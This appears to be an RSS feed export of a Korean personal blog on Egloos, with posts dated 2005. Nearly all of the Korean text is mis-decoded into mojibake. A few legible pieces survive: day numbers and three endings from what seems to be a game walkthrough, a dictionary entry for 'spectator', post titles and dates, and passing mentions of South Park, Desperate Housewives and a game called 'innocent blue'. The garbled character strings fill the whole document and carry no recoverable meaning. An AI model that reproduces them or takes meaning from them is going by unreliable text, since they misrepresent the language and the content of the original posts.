    -ַ״ְת½ְֵ ÷ֿ÷־ְַ ֵ¸ְ׃½½¸³ ְּ÷¥ֶ® ִָ ³×·חְֵַֽ ¹מ»ח°ר¿¡°װ µ¹ֱִֶ¶°ַ µיְ½
    -·¹¿ְ ¹׳  ְ¯¾ֶ¸ף½÷ֵֽ·־ µ¹ִֶ °¡´ֹ(´, ְ¯¾ֶ¸ף½÷ֵֽ ֱ ַֿ³×´ֲ ¹µו½ֳ ַ״ְתְּµ¿ °¡´ַֹ״¾ ַׂ°ֽ)
    -*¹´ְֱַר¹ּ´ֲ ְִָּ¿¡µµ ֶקָ¹°¡´ַֹֿ´ֿ ¹«¸®ֱַֿצ ¸»°ֽ
    -
    -@ ¾ָ°³ְַ ½£
    -27ְֿ: ִֵה´¸¶ ֶקָ¹
    -ֱֲֳרְ¸·־ µי¾מ°¡ ½£ְַ ֱצַֿµµ¸¦ ֵכ°תַֿ¸י ¹·־ ¸¸³× ֶקָ¹
    -´, µ¶¹צ¼¸ ¹׳ µ¶¹«ָ¿ ִ³¸¯ֵֽ¸¦ ִֶֶ¼¿¡ ³ײְ» °ֽ
    -
    -28-32ְֿ: ¸¶ֱצ¼ַ, ¹ל³א ֶקָ¹
    -¸¶ֱצ¼ְַ÷ ְֵץִָ ·¹¿ְ¸¦ ֳ£´ֲ ְּ÷¥ֶ®  3ָ¸ ִָ ·£´‎, ¹ל³א´ֲ ·£´‎ְ¸·־ ³×¿ֽ 2ָ¸ֲ°¿¡ ֶקָ¹ °¡´ֹ(¹ל³א¸¦ ֶקָ¹ֱַֿצ ¾ְ» °ז¿ל ¿¡¸®³× & ¹ל³א ·¹ֱמ ְּ÷¥ֶ®)
    -½£ֱ¾׃ »ף´ְַ ֱצ¿ֱ¹ֱצ´ֲ ¸¸³×°ם ³­ִָ(¹·־ µµ¸ֱ) »ׁ¸®¸¦ µ־¹ר ֱ¢ֳַֻֿ¸י »ׁ¸®¿ֽ ְֵץ °¡´ֹ
    -(4±÷µ¥ְַ »ׁ¸®¸¦ ¹«³¶¸®¸י ֱצ¿ֱ¹ֱצְַ ָ¸÷¹·ֲ »ף½ַ, ְִָּ ֱ¾¸¶ֳׁ°ר°ְ¸·־ °¡÷±°װ ִֵֽ¡)
    -ֱצ¿ֱ¹ֱצ¸¦ ¾²·¯¶¸®¸י ֵ°¶ף¿ְַֽ ְּ÷¥ֶ® ִָ, »ף´ְ¸·־ ְּµ¿... ¿©ְ¸ף½÷ֵֽ ֶקָ¹°¡´ֹ... ִִִָָָ
    -¹µו½ֳ ֶקָ¹¹¶ץ´^^)
    -
    -@ ¸¸¸®ְו¼÷
    -33ְֿ: ַֿ¸®¸¶¿ְ ֶקָ¹
    -¸ֱֲ»ף´ְ¸·־ ְּµ¿ַֿ¿© ֱ‎¿¡ µי¾מ°¡¸י ַֿ¸®¸¶¿ְ ְּ÷¥ֶ®
    -ַֿ¸®¸¶¿ְ´ֲ ִֶֶ¼¿ר ְֱַ ַֿ³×°¡ ÷´¿¡ °ֹ¸®ֱצ ¾ְ¸¸י »ף´כֱַֿצ ¾ְ¸¹ַ·־ ֱײְַ.
    -2ָ¸ ְּ÷¥ֶ® ִָ ´כְ, ֶקָ¹
    -
    -34ְֿ: ¸ְּµ¿ ¹׳ ֵץ¿ֱ ְּ÷¥ֶ®
    -¸¿לַֿ´ְ¸·־ ְּµ¿ַֿ¸ח ·£´‎ °בֵץ ¹׳ ְּ÷¥ֶ®
    -ֵץ¿ֱ ְּ÷¥ֶ® ִָ µ¿·בµיְַ ±¸ֳג ְּ÷¥ֶ®
    -
    -35ְֿ:ֵהִ ֶקָ¹
    -¹´¿¡ ¶³¾מֱר ֱ¾ְַּ׀ְ» µ¶ף°¡¸י ֵהִ¿ֽ ¸¸³³´ֿ´.
    -1ָ¸ ´כ°ב ִָ ֶקָ¹
    -
    -36ְֿ: »לִֶ °ר·«
    -¸¿לַֿ´ְַ ¹ז¿¡ °¡¼­ ְֵץ ִָ ֶקָ¹
    -´, ְת³ב¶§ °¡¸י »לִֶ°¡ °­ַ״ֱצ¹ַ·־ ¹µו½ֳ ³·¿¡ ±ג½ְ^^
    -
    -37ְֿ: ¹«±ג°ם °ר·«
    -ְ´חָק ֵ½»צ ִָ ¹«±ג°ם¸¦ ֱצֵ°´ֲ °¡µנ¾נ°ת ´כ°ב(ֱ¾¸¶ֳׁ°ר°ְ¸·־ ³«½ֲ)
    -
    -38ְֿ: ¿¡¸®³× ְּ÷¥ֶ®
    -¸¸¸®ְו¼÷ ¼צֱ‎ ¹׳ ֵ½»צ
    -¿¡¸®³×ְַ µ¹° ְּ÷¥ֶ®
    -
    -@ָ­»ך
    -39ְֿ ְִָּ -56ְֿ±מֱצ
    -¿¡¸®³× ְּ÷¥ֶ® ִָ ֵ©¶ףְִֻּ »חְ·־ ¿ֽ¼­ ¿¡¸®³×¿ֽ ¿©ְ¸ף½÷ֵֽ ±³ָ¯ ¿ה±¸(±³ָ¯¿¡ ְְַֿ¸י °װְ׃ ¿ְ¹צ)
    -ָ­»ך¿¡ µי¾מ°¡¸י ¹ֵ°¸®, ִ«¹ּ³×¸®ֵ¸ְּ°ם, ¹טֶ²³כֶ® ֶקָ¹
    -ָ­»ךְ÷ ¾ְֵֶּ»ח¿כ÷ׂ°¡, ¸»ח¿כ÷ׂ°¡, ±ָֽ¯³×¹µ°¡ֱצ »ח¿כ÷ׂ°¡(°ר·«¿¡ µ¶ף ַֿ³×¾¿ °¡´ַֹ״ֱ)
    -¹ֵ°¸®÷־ֵֽ ֶקָ¹ַ״¼­ ֲקִָ ֶקָ¹ְַ ±גֳ·־... ִ«¹ּ³×¸®ֵ¸ְּ°ם´ֲ 4ָ¸ ְֵץִָ, ¹טֶ²³כֶ®´ֲ ֳײִָ¿¡ °ֵץ
    -(¹טֶ²³כֶ®¿¡±מֱצ °¡´ֲ ±ז¿¡´ֲ ¿©ְ»לְ־¸¶°¡ ³×ֵ¸³× ¿ל¸®ֶם ְ·ְֲ» °¦¾ֶ¸װְ¸¹ַ·־ ֵץ¸ם½÷ֱַ·¹ְּ »ח¿כַ״ֱ°ֽ)
    -
    -@ְִּ« ְתֳֵ
    -56ְֿ ְִָּ
    -´רֱ¯¿¡ 3ָ¸ ְּ»ף µי¾מ°¡¸י ¿¡¸®³×°¡ ¸ף½÷ֵֽ°¡ µַ¹צ¸®´ֿ ¾ֻ¾ֶ¼­ ַֿ½ֳ±ז...
    -ְִּ« ְתְֳֵַ ְֵץ´ֲ 1ָ¸´ֲ ¿הְִַ »ש±מֱצ °¡´ֲ ·חֶ® °³ֳ´, 2ָ¸¿¡´ֲ ¼מ÷־ ÷¸½ֳ´ֲ ְֲ¸·־ ַֿ½ֳ±ז...
    -
    -*°ֵ´כְִּ«³²ְ°תְַ ְֵץ
    -- ¾מֲ¥ַַ ¾²·¯ֶ®¸®±ג ±·¶ְ¸´ֿ±מ ֵ©¶ףְִֻ» µµ¿ף½ֳ´.
    -ְֵץ°¡ ½ְֳµַ¸י ֵ©¶ףְִֻּ ³×ֵ¸³× ְִּ« ³²ְְַ ¸׃¸®·־ ְּµ¿ַ״¼­ ÷¸¼®ְ» »ְּ¸·ֱ°ם ַױ´ֿ´.
    -ְּ¶§ °­ַׁ ֵ¸°ְ» °¡ַֿ¸י ֵ©¶ףְִֻּ ¶³¾מֱצ´ֿ±מ ±׳³ֹ ·¹¿ְ·־ »נֱת °ר°¸¸ °ט¼׃ַֿ°ם HP³× ֳ₪¿צֱ½ֳ´
    -
    -¿£µשְ÷ ´ְ½ 3°¡ֱצ
    -1. ַׂ·½ ¿£µש: ¸נµח ¿©ְ¾ײ ¸ף½÷ֵֽ¸¦ ֶקָ¹ַׂ °ז¿ל
    -2. ¿¡¸®³× ¿£µש: ¿¡¸®³×°¡ ְ־°£ְ¸·־, ´¸¥ ¸ף½÷ֵֽ¿ֽ סיץף 0
    -3. °³÷° ¿£µש: ֱ¶°ַ ֳזֱ· ¸ף½÷ֵֽ¿ֽ °³÷°...(ְֿ´ ¿£µש÷¸¸י ֱ¶°ַ ֳזֱ·µַ´ֲ ¾ײµיְ÷ ´ ¿ְ¸¶ִֹ ָ¸»ף¿¡ µמ·ֿµַ´ֿ... »נֱת ±ֱצ)
    -
    -
    -PS. ¾¸®½÷ °װְ׃ֱ ¼­÷ס½÷ ֳײ°ם±÷¿ה.
    -ַ®ְ½¼÷¿¡ ³²ְִ³¸¯±מֱצ ÷¸ְּ½÷... °ְֵַ ¸נµח ½ֵ¿¡ ְ½¼÷ֳ₪¿כ¿¡... ¼÷¿ל´ֲ ָ£ִםֵה ¹ּ³×¹ּ, ְױ½ֳֵ° ָקִ«·ח, ִם»ח¾³×±ג ֱ״ִ µמµמ... ְּ ¹´ְַ ¸ְְּת ¼÷¿לֱר ֳֳׁגµ¿... °¡ָק ֳָ£ָ­ְֶַּ¶ף°ם ַ״µµ °ת¾נְּ ¾ֶ´ױ´ֿ´.
    -
    -PS2. ¶ץ½÷7 ¸¸¼¼^^
    -
    -
    -
    -
    -
    -
    -
    - - ]]> -
    - ¹ּ÷׀·ש - Tue, 20 Dec 2005 10:01:25 GMT -
    - - <![CDATA[ ְ־ֵֽ³°ת ¹ז°, ±׳¸®°ם ³× ]]> - http://calmguy.egloos.com/2027275 - - spec¡₪ta¡₪tor
    ¡², ¦¢¡³ n. (fem. -tress[]) ±¸°ז², °°´;¹ז°ְ, ¸ס°ְ
    -spec¡₪ta¡₪to¡₪ri¡₪al[] a.
    - 
    -³»°¡ ¿µ¾מ´¾מ spectator¸¦ ¾ֻ°װ µָ °ְֽ÷ ¾ֶ¸¶ ֱַ׀±³ ¶§ְַ ְְּֿ¾ת´ר °ְֽ¸·־ ±ג¾ןַׁ´. ±׳¶§ְַ ¶זְּ ±¸°ז², ָ₪ְ÷ ¹ז°ְ¿´¾ת´.
    -¹«½¼ »ח°ם°¡ ³×¼­ »ח¶קµיְּ µׁ·¯¼­¼­ ֱצִׁ÷¸°ם ְײ´ֲ °ֽ ±׳°ְּֽ ¹ז°ְְּ´. ¹ז°ְ´ֲ ¹«½¼ ְְּֿ ְֿ¾מ³×°ם ְײְ¸³× ´ֱצ ±׳ »ח½ְַ÷ ְ־ֱצַֿ°ם ְײְ» »׃ ±׳ »ח°ַ¿¡ ¿µַגְ» ¹ִּ¡±ג ְ§ַׁ ¾מ¶² ְְֿ» ֱַֿצ´ֲ ¾´ֲ´. ֱן, ±׳µיְ÷ ְײְ¸³× ¾רְ¸³×ַׁ ֱ¸ְחְֿ »׃ְּ´.
    -ְ־ֵֽ³ְּ¶ף´ֲ ¸ֳֵ¼´ֲ »ח¶קµיְ» ¹ז°ְ·־ ¸¸µו´ֲ ְָ» °¡ֱצ°ם ְײ´. ¾מ¶² °ְֽ» ְְ¯·־ְּ ¿­¶קַׂ ¼צ ְײְ¸³× ¹÷°¡¸¦ ַ״µµ µַ°ם ¾ַָ״µµ µַ´ֲ ¾ײ¸ֵַׁ »ףָ², ְֽ¸ם¼÷, ±׳·± °ֽµיְּ »ח¶קµי·־ ַֿ¿©± ְ־ֵֽ³ְ¸·־´ֲ ¹«¾שְ» ַ״µµ ±¦ֲת´´ֲ ´ְ³¦ְ» °®°װַׁ´.
    - 
    -(continue...)
    - - ]]> -
    - ¹ּ÷׀·ש - Thu, 15 Dec 2005 13:45:44 GMT -
    - - <![CDATA[ ֱצ¸£´ֲ ְְַ °ב¸»ְּ ¾ֻ°ם ½ֽ´ץ³ִ? ]]> - http://calmguy.egloos.com/2017199 - - -³­ ¸׃ֱצ¾¾ֶ ְֿ÷»¿¡ °¥ ¿¹ֱ₪ְּ±ג ¶§¹®¿¡ ±׳ְ¿¡ °ֵ±ג¿¡ ½ס¾ֶ¹צ¸° µ·ְּ ²ֿ µַ¾ת´.
    -±׳¸®°ם, ¸¹ְּ µ¹¾ֶ´´ׂ °ְּֽ±ג ¶§¹®¿¡ ·£µו·־¹¸¦ ַֿ³× »עְ¸¸י ַ°ם...
    -±׳·¯³×... »ך°סֲ¥±ג ֶ¼ִֿ¿¡ ¼צ½¸¸¿רְַ µ·ְ» ½ס¾ֶ¹צ¸° »ףָ²ְּ¶ף µ·ְּ ¾ר¾ת´.
    -·£µו·־¹... »ח°ם ½ֽ¾ת´. ֵ©ָז...
    -¹®µז, ¹זַׁ±¸¼®¿¡ ³ץְ־ ֳַ½÷ 50005(ָ­ְֶּ®ֳַ½÷)°¡ ´«¿¡ µי¾מ¿װ´.
    -ְּ°ַ »ץ ¹°°ְַ¸·־ ְ¿¡ ¾²´ר 3¸¸¹ר ֳַ½÷°¡ ¸ְ°¡¸י ¹·־ ±ג°ט¸¦ ¹²דִ¡±ג ַׂ·ֱ°ם °¡ֱצ°ם ְײ´ר °ְּֽ´.
    -¾ֶ... ְת°װ ³»°װ ¹«½¼ ¼ׂ¿כְײְ»±מַֿ´ֲ »‎°¢ְּ µח ¼ר°£
    -³×´ֲ **ְ¥¿¡ ±׳ ¹°°ְַ÷ ¸ֵ¹°·־ ³»³ץ¾ׂ´.
    -¸¶ִ§ ְ‎¹¦ַֿ°װ ֱצ¿×ְּ ¸ֲ¾ֶ ¶³¾מֱצ´ֲ »ח¶קְּ ְײ¾מ ¾ײֳ ֱ¦½ֳ°¡¿¡¼­ 5ֳµ¿ר »©°ם ֶָ¾ׂ´.
    -ָןֱ₪ְ» ¸¶ִ¡°ם ֲק¸¦ ¸פ°ם... ±׳ »ח¶קְּ ְײ´´ֲ µ¥±מֱצ °¬´ ֱײ¾ת´.
    -±׳ »ח¶קְ÷ ¹«½¼ ִִֵֽ °¡°װ¸¦ ַֿ°ם ְײ¾ת´ֲµ¥ ֱ¡½ְֹ¸·־ ½־±¸·ֱ ±טִ¡ֲמ°װְ־°¡¸¦ ¸װ´°¡ ¿פ´ֲ ¾ף±¼·־ ³×¸¦ ¹°ו´.
    -ֲק¸¦ ¸פ°ם °£ ַַ°ןַװ°ת ±ג¸§°×ְּ¶ף´ֲ°װ ְײ´ֱֲצ¶ף ±׳³ֹ 5ֳµ¿ר ´ץ ÷ְֿ±מ ַֿ´°¡ ֳרְ÷ַׁ ¸¶ְ½ְּ µי¾מ ±׳³ֹ µ· ¹°ם ³×¿װ´.
    -¾ײֳ ±¸¸ֵ°¡ 20¸¸ + 3¸¸ 5ֳµ(»ץֳַ½÷+»ץֳ°¡ֶ׀µו)ְּ´ר°ֹ ¹³ג »חְּ¿¡ 14¸¸ 5ֳµְּ¶ף... ַדַד(9¸¸¿רְַ ְְ, ֲ°ם·־ ³» ֳַ½÷´ֲ ַׁ¹ר µ¹¸° ½ֵ»זְּ¾ת´)
    -ֳַ½÷ »לµ· ְײְ¸¸י ¹הְּ³× ְֱֱ÷°ֵ ¸װֱצ...
    -ֳַ½÷ »ל°ֵ¸י ¾ֶ²¸¼­ ¿ְּ¶ףµµ ְֱֱ÷°ֹ »ל°ֹ ַ³×?
    -¹®µז ±׳ »ח¶קµµ ֳרְ÷ַֿ°ם ³×µµ ֳרְ÷ַ´.
    -ֲק¸¦ ¸פ°ם ³×¿ְ´ֿ ´«¾ױ¿¡ ·־¶ַ ¹יָ­ֱ¡ְּ ְײ¾מ ÷°»‎°¢¾רְּ µי¾מ°¬´.
    -±׳¸®°ם, ֱ¦¹‎ ֶ°ֶ°ַ״÷¸ְּ´ֲ ½ֳַַֹׁ µנְְ־ְַ ·£µו·־¹¸¦ ַֿ³× »ע´.(ֱצ± ±ְ» ¾²°ם ְײ´ֲ ½ֱֳ¡¿¡µµ ֶם¾ַָׁ ¹¿¡´ֲ ±׳°װ ½ֵ°ֱ®ְײ´)
    -ֱצ±, ³×´ֲ °ְֹ»¶§ ֶםַֿ´.
    -°ת¿¬ ¹זַׁ±¸¼®¿¡ ³ץ¿©ְײ´ר ֳַ½÷´ֲ ³»°װ ¹«½¼ ָ¿¿כ(use)ְּ ְײ´ר °ְֽֿ±מ?
    -ֱצ¸£´ֲ ְ¿©, ֱצ¸£±ג ְ¿¡´ֲ °ת¿¬ ±׳°ְּֽ ³»°װ ֱײ´ֲ ֱ₪½ְֵ ָ¿¿כ°ת
    -´חְו ַ¿הַׁ ¹°¸®ְ ָ¿¿כֱ¿¡ ¾מ´ְ °ְּֽ ´ץ ֱ¿הַׁ ֱצ¸¦ »‎°¢ַ״÷ֱ¾ ַׂ °ְּֽ´.
    -
    -PS. ֱַׁ ¿ה¾א
    -µ· ¾ֶ²¸½ב¶ף~ :D - ]]> -
    - ¹ּ÷׀·ש - Mon, 12 Dec 2005 09:02:12 GMT -
    - - <![CDATA[ ¾ֱֶײ ¿ְ·£¸¸¿¡ ¿ֽ¼­ ¾²´ֲ ±... ]]> - http://calmguy.egloos.com/1921543 - - -±׳·¯³×... ¿הֱעְ÷ ¹ֲכְ÷ ַצ½ַ¿¡ ִֶ¹¯ַפ¹צ¸° »‎ָ°ְ» ַֿ°םְײ´ֲµ¥´
    -µָק ¿¡·־°װ¸¦ ַֿ°ם ½ֽ´´ֲ »‎°¢ְּ µיֱצ ¾ְ¸´ֿ ְ¿¬½÷·¹ ±¾µ ְֿµµ ¾ר¾מֱ® ֱ¶¿כָק ְײְ» µ¸§ְּ´.
    -°¡² ¸µֵ©µָ ְּ±·ח¸¦ ¼רָ¸ַֿ±ג´ֲ ַׁ´. ֱַֿצ¸¸ ±׳·²¶§¸¶´ ´ְ³¢´ֲ °ְֽ÷ ֳֳ¢±ג¿¡ ÷סַ״¼­ ±׳·¸°װ ְ׀ְ»¹‎ַׁ ±µיְ÷ ¸¹ְּ »ח¶ףֱ³´´ֲ °ְּֽ´. ¹°·׀ ±׳°ְֽ÷ ³»°¡ °½ְֹײ´ֲ ¿¡·־°װ³× ¾ֶ´ֿ¸, ֱ¾ַױַֿ¿© ְֿ÷» ¿µ»ף¹°¿¡ °ַׁ °ֽµיְּ´.
    -¿¡·־°װ¸¦ ַֿ¸י¼­ ¿ל¸®°¡ ¸פ¶ת´ר ¼°ֱר ¸םְְּ³× ֱײ¸סַ״÷ֱ¾ ַׂ ֱ¡µיְ» ְּ¾±גַֿ´ר ±׳·± ±םְְּײ´ֲ ½ֳ¼±ְ÷ »ח¶ףֱצ°ם
    -ְֱּ¦´ֲ ¿¡·־°װ¿¡ ´כַׁ ¾ך±ג¶ץ ±׳ְת ¾מ´ְ ±׳¸²ְּ ָ­·ֱַ״¼­ ַ״÷¸°ם ½ֽ´´ר°¡ ְֿ÷»¿¡¼­ ¹ּ¼ׂ³א °·ֳ »ףַ°ְ» »ע´´ֲ 'ֱת·¯¶ף' ְ¯ְַַ ±ְּ ¸¹¾ֶ¼­ ±׳´ֱצ ´«µׁ°קµµ ¾ר¾מֱר °ְּֽ »ח½ְַּ´.

    -ַצ´כ¿¡ »ל¸י¼­ »ח¶קְּ ֱ¡ֱ¡ ´ץ ¹» »מְ» »ח´ֲ °ְֽ÷ »ח½ְַּ´. ±׳·¡¼­ ַ¿¬ְְ¸·־ »ח¶קµיְַ »‎ָ°ְּ¶ף´ֲ °ְּֽ ¼ר°£ְְ־ °ְּֽ µַ¾מ¹צ·ָ´´ֲ °ֽ¿¡ ´כַ״ °ר°¨ְ» ַׁ´. ±׳·¸ֱצ¸¸ ְּ·± ½ְִ¸·־ »ל´°£ ¾מ¶² °ֽ¿¡ ´כַ״ »‎°¢ַ״ ÷¼ ½ֳ°£ְּ¶ף´ֲ °ֱֽ¶ֲק ¾ר¾מֱצ°ם °ב±¹ »מ ְֳ¼°¡ ְ־½÷ֵֶֿ® ַ¹צ°ֳֵ³·³ °ׁ¸¸ ָ­·ֱַֿ°ם ³»½ְַּ ¾ר´ֲ °ְֽ÷ ְֲ¸·־ °ז°טַׂ ְְּֿ ¾ֶ´ׂ±מ ַׁ´.

    -¾מ´ְµ¡ ¹» »‎ָ°¿¡ ÷ֱ®¼­ °ְֵַ ְֿ¿¡ ´כַׁ »‎°¢ְּ 80% ְּ»ףְַ ½ֳ°£µ¿¾ָ ¸׃¸®¼׃¿¡ ´¶ף÷¾מ¼­
    -ְֱּ¦´ֲ 20%¶ףµµ µ¶ֶ¯ַֿ°ם ¾ץ¸ְֱֵּצ ¾´ֲ »‎°¢¿¡ ´כַׁ ¿µ¿×ְ¸·־ ÷¸ֱ¸ַֿ°ם ½ֽ¾מֱר C&W ְְ½. - ]]> -
    - ¹ּ÷׀·ש - Fri, 11 Nov 2005 04:55:23 GMT -
    - - <![CDATA[ ¹ּ±¹ ¾ײµיְּ »‎°¢ַֿ´ֲ ַׁ±¹ ¾ײ´ֿ¸ְּ¼ַ°ט =_=; ]]> - http://calmguy.egloos.com/1803071 - -
    -
    -¹¹ ´כ·« ְּ·± °קְּ¾ת´ר °ְּֽ´.
    -°ת°ֵ ַׁ¶§ ±׳·¨´ר ְְּ ְײ¾תְ»ֱצµµ ¸נ¸¥´°ם »‎°¢ַׁ´.
    -±׳·¯³× ¿הֱע±מֱצ ְּ·²·ֱ³×? =_=;
    -(ֳגֳ³: 'South Park') - ]]> -
    - ¹ּ÷׀·ש - Tue, 4 Oct 2005 05:35:49 GMT -
    - - <![CDATA[ ֳײ±ְַ ±ָ² ]]> - http://calmguy.egloos.com/1696319 - -
    -
    -1. ¿הֱעְ÷ ְּ ¾ײ´ֿ ¹¿¡ ÷¸ֱצ ¾´ֲ´. ±גָ¸µַ´ֲ ÷׀µיְ÷ ²ְ ÷¸½ֳ±ג ¹¶ץ´.
    -¾חֵ° ¼¾½÷µµ ±׳´ֱצ ³×»ֱצ ¾´´ֲ »‎°¢ְּ µי°ם ְײ´ֲ ֱ...
    -ֱצ±±מֱצ ÷¸¾ֶ¿װ´ר ¿µ»ף¹°ֱ¿¡ ְֳּ³·³ ְ¿¬½÷·¯¿ל¸י¼­µµ ³כ°סְְ־ °ַ ֳ³ְ½ ÷» °ֽ °°´.
    -¾מַ׀ ½ַ·ֲ ¹ט¾חְ» ְ§ַ״ ÷¸¾ׂ°ַ¸¸ ¿ו¸¸ ¹ט¿מ°ֽ °°´.
    -U~BASTARD~!!!
    -
    -

    -
    -2. ָ£ֶעְ» ¹°ם ְײ´´ֲ ´ֿ³׳ָק¸ ֳַ½÷ְֶַ» GET.
    -¾מֲ·°ֵ³× ³»¿כְ÷ °ְַַׁ°ֵ °°ְ÷µ¥... ¹«½¼ ְח¹ּ°¡ ְײְ»·ֱ³×? =_=a
    -¼÷¿ל ֱ₪÷¸´ֲ ¸¾¿¡ µח´. ¿הֱע ְֱײ÷¸´ֲ ³×ִ«ַֿ¶ף ¸¶ְּ, ½ֳ¹ֱּמ ¾ְֶּ, ִ¡¹ »ח¿¡ִ... µמµמ
    -¿ְֱַ´׳ ÷¸°ם ÷ְְ־ֱ...
    -
    -

    -
    -3. °¡ְ»ְּ µַ¾מ ³¯¾¾ ¼±¼±ַֿ´ֿ ´½ֳ ְג¾ֶ÷¸°ם ½ֽ±גµµ ַֿ´¸¸...
    -ְ־¿¬ְּ ¾ר´ֲ °ֱַצ, ¶¯±גֱת ¾´ֲ°ֱַצ.
    -
    -4. ְֱּ¦ ¹ּ¼ׂ³א °װְ׃ְַ µ¶÷¸ְְ־ ֱ¸ְח°¡ µַ¹צ¸° '±׳÷׀'ְַ ¼ׂ½ְִ» µי¾ת´.
    -'ְּ½÷' ֶ׀ִ¡¸¦ ¸¸µי´ ´©°¡ ְ±ג ֶ׀ִ¡ ÷£ֵ¸ְֶַ» ֵ©·¢ַ´°ם ¿­¹¾ֶ¼­ ְ¾ק ±׳¸¸µ׀´°ם ֵץֱ₪ְ» ÷־¸®´ץ±¸¸¸.
    -ַַֿֿ~ ְ¹ְַֿו, ¶ֻ¹¯ְ÷ °³... µמµמְַ ¼׃´דְּ ¸׃¸® ¼׃ְ» ¸ֹµ¹¾ׂ´.
    -¾ֶ¾ֶ~ ±׳·± ְ§´כַׁ '±׳÷׀'°ת ַׁ¶§ ְ¾קַ´´ֲ °ְּֽ ְֲ¸·־ ¿µ±₪ְּ·־¼ְּׂ´.
    -=_=)₪ַ
    -
    -5. EASY COME, EASY GO.
    -
    - ¾ײ·־°׳ְּ ¸¹´ַֿ³× ±ֲֵַ¾ֶ·¡ ¾²·¹±ג·־´
    - ½÷ֵµַֿ°ם ½÷ֵµַֿ¸י ¸ר ³¡³¾¸® ¾ר°ַ¸¶´ֲ
    - °¡ֱר °װ ¸¹ְ÷ ְ°¡ ַׂ°װ ¸¹´ ַֿ´ץ¶ף.
    -
    --¿×½ֳ µ·ֱײ°ם »ח¾ °װְ׃ְ» ֱ¦´כ·־ ַׂ °ְֽ־°¡? =_=;
    - - ]]> -
    - ¹ּ÷׀·ש - Tue, 30 Aug 2005 07:25:52 GMT -
    - - <![CDATA[ ֳֳµַׁ´ ²ְ÷ֱ¶ף~ ]]> - http://calmguy.egloos.com/1502040 - -
    -
    -¾ֶ ֱ₪¸» ְח¹ְּײ¾ת´. <ְ§±גְַ ֱײ÷־µי: desperate house wives>
    -ְּ°ַ ֳײ±¿¡ ¿µ¾מ°ר÷־¸¦ ְ§ַ״ ÷¸´ֲ °ְֽ־µ¥
    -ֱ₪¸»·־ ְ ֲ¥¿©ֱר ±¸¼÷¶§¹®¿¡ 3ְֿ¾ָ¿¡ 1½ֱֳנְ» ´÷» ְַ°ְּ´.
    -¹«¾שְּ ±׳·¸°װ ¸ֵ·ְְֲּ³ִ°ם?
    -ְֿ´ ±¸¼÷ְּ ֵ÷ֵ÷ַֿ°ם ְַפ ¶ב±¾ר´ֲ µםַׁ ¼ְׂחµיְ» ְּ¸® ¿«°ם ְת¸® ¿«°ם ַֿ¸י¼­µµ
    -»ך¸¸ֱַֿצ ¾°ם ֱצ·חֱַֿצ ¾°ם ְֳ¼ְְ¸·־ ±ױְַײ´ֲ ½ֳ°¢ְ¸·־ µו¶ף¸¶¸¦ ±׳·ֱ°£´´ֲ ֱ¡ְּ´.
    -ְּ µו¶ף¸¶¿¡¼­ ַׁ¸םµµ ¾µ¸נ¾ר´ֲ ¹ט¿×ְ÷ ¾ר´°ם ַׂ ֱ₪µµ·־ ¹ט¿לµµ ְְחְ¼ׂ¿´´.
    -¹«¾ש÷¸´ ¸ֵ·ְְֲ־°ַ ±¦ָק ְּ¾±ג¸¦ ַ״ַַ¿£µשְ¸·־ ²ר°ם °¥·ֱ°ם ֱַֿצ ¾´ֲ´´ֲ ֱ¡ְּ´.
    -±׳·¯´ֿ±מ... ³¹« ¾מµ׃ֱצµµ ¾°ם ³¹« ¹אֱצµµ ¾°ם... ¿ל¸®µיְּ ¾מ¶² »ףָ²ְ» ֶַ´ַׂ¶§ ָחָק ´ְ³¢´ֲ ±׳ ´ְ³¦.
    -¹·־ "ְ µָ°ֱַצ ¸נ¸£°´"¶ף´ֲ ֱ¡ְּ´.
    -ֳֳµְּ´ ²ְ÷ֱ¶ף. - ]]> -
    - ¹ּ÷׀·ש - Sun, 3 Jul 2005 08:21:51 GMT -
    - - <![CDATA[ ³×ְַ ¿¡·־°װ °ם¸£´ֲ ¹ז¹‎ ]]> - http://calmguy.egloos.com/1491304 - - -±µ¥ ¿הֱעְ÷ ְח¹ּµµ ½ֳµיַֿ°ם ַַ°ןַֿ´.
    -°װ´°¡ ¸ֵ¿ש¸»¿¡ ½ס¾ֱֶצ´ֲ ³¯¿¡´ֲ ¹«¾ף ¹¾ֶ¾ ֱַׂצµµ ֲ ³­°¨ַֿ´.
    -±׳·²¶§´ֲ ±׳³ֹ ÷°»‎°¢¾רְּ ¾ָ ¹°ם ¸¸´.
    -¾ָ¹°ם 1ֱײְֿ¸¸ ֱצ³×°¡÷¸ְ.
    -±׳·¯¸י ְ¢¸¸ֵ­ ָ°¹ַׁ ִ¿¹ֲ´ֶֿ¼¿¡¼­´ֲ ´ ֶע°¡°¡ ³×¿ֲ´.
    -ְ¾מµµ ±׳°װ ֶרֵ÷ְ־ֱצ ַׂ¸¸ַׁ °ֱַצ ֱ₪µµ´ֲ °ב·׀ְּ ³»·ֱֱר´.
    -±׳·¯¸י ±׳·²¶§ ¾µ¸¸ַֿ´´ֲ °ֵ ַׁµ־°³ ¹°ם ֱ¶¿כָק »ח¶ףֱר´.
    -³×¿¡°װ µ ¸ֲ´ֲ °װְ׃ְּ ±׳ ֱ¿¡´ֲ ¾רְ»ֱצµµ ¸נ¸£°ם
    -³»°¡ °¨¸ם±ם°װ ַׂ °װְ׃ְּ »ח¶קµי¿¡°װ ְֱֱ÷ ֶע°¡¸¦ ¸ר ¹ְ»·±ֱצµµ ¸נ¸¥´.
    -´, ³×´ֲ ¾מֲ¼´ ³ץֳִ¹צ¸±ֱצµµ ¸נ¸£´ֲ ¸םְ °װְ׃ ַֿ³×¸¦ ְ§ַ״
    -ְ§¿¡ ¿­°ֵַׁ ¹÷¸ֱ‏ְ» ַׂ »‎°¢ְ÷ ְֱּ¦ ֱ¶±µµ ¾ר´. - ]]> -
    - לםָׂ‏שְ - Thu, 30 Jun 2005 05:50:37 GMT -
    - - <![CDATA[ NTR ¼צִ¡ ´כֶר ֱץ´כֱ... ]]> - http://calmguy.egloos.com/1458321 - - -ְּ¸§ַֿ¿© innocent blue...
    -ְ½... ְּ¸§¸¸ ÷¸¸י '¼ר¼צְַ ½ֳ´כ'³× ¹¹ ÷ס½÷¹«¸®ַׁ ¹÷°¡ ¼ר¾ײְַ ְּ¹ֱּצ¸¦ ַ³±ז·±ֱצ ¸נ¸£°ְ¸³×...
    -ְּ °װְ׃... ±·¡ ³×¿ֲ NTR¹°ְּ´. =_=;
    -NTRְּ ¹÷ֱצ´ֲ ְ¼¼ַׁ ¼³¸םְ» »‎·«ַֿ°´.
    -

    -

    ¹¹... ְּ ±׳¸²ְ» ÷¸¸י °¨ְּ ¿ֳ°ְּֽ´.


